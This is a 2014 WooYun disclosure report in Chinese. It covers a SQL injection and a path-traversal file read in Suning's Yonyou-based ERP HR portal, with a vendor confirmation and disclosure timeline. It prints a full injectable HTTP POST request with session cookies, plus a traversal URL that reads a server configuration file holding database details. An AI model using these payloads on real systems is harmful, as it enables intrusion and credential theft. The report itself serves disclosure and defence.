缺陷编号:WooYun-2014-089191
漏洞标题:苏宁某关键业务SQL注入+文件读取
相关厂商:江苏苏宁易购电子商务有限公司
漏洞作者:0x70
提交时间:2014-12-29 15:45
公开时间:2015-02-12 15:46
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
Tags标签:
2014-12-29: 细节已通知厂商并且等待厂商处理中
2014-12-29: 厂商已经确认,细节仅向厂商公开
2015-01-08: 细节向核心白帽子及相关领域专家公开
2015-01-18: 细节向普通白帽子公开
2015-01-28: 细节向实习白帽子公开
2015-02-12: 细节向公众公开
苏宁某站SQL注入+文件读取(内网数据库信息泄露)
我是来刷漏洞的,就没继续深入了http://erp.suning.com.cn//hrss/用友的erp,存在SQL注入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1<br> Host: erp.suning.com.cn<br> Proxy-Connection: keep-alive<br> Content-Length: 648<br> Pragma: no-cache<br> Origin: http://erp.suning.com.cn<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36<br> Content-Type: application/x-www-form-urlencoded<br> Accept: */*<br> DNT: 1<br> Referer: http://erp.suning.com.cn/hrss/ResetPwd.jsp<br> Accept-Encoding: gzip, deflate<br> Accept-Language: zh-CN,zh;q=0.8<br> Cookie: JSESSIONID=21B03BFC5CF7534F78748B7E452308C1.server; JSESSIONID=9CD3D903D515D8FE454CB447314BF6D1.server__type=updateData&__viewInstanceId=nc.bs.hrss.login.ResetPassword~nc.bs.hrss.login.ResetPasswordViewModel&__xml=%3Crpc%20transaction%3D%2210%22%20method%3D%22resetPwd%22%3E%3Cdef%3E%3Cdataset%20type%3D%22Custom%22%20id%3D%22dsResetPwd%22%3E%3Cf%20name%3D%22user%22%3E%3C/f%3E%3Cf%20name%3D%22ID%22%3E%3C/f%3E%3C/dataset%3E%3C/def%3E%3Cdata%3E%3Crs%20dataset%3D%22dsResetPwd%22%3E%3Cr%20id%3D%2210009%22%20state%3D%22insert%22%3E%3Cn%3E%3Cv%3E*%3C/v%3E%3Cv%3Eaaaa%3C/v%3E%3C/n%3E%3C/r%3E%3C/rs%3E%3C/data%3E%3Cvps%3E%3Cp%20name%3D%22__profileKeys%22%3EfindPwd%253B15b021628b8411d33569071324dc1b37%3C/p%3E%3C/vps%3E%3C/rpc%3E&1419836449668 |
二.文件读取http://erp.suning.com.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml
你们更专业
危害等级:高
漏洞Rank:10
确认时间:2014-12-2916:30
感谢提交。带小伙伴抗刀!!
暂无
原文连接
的情况下转载,若非则不得使用我方内容。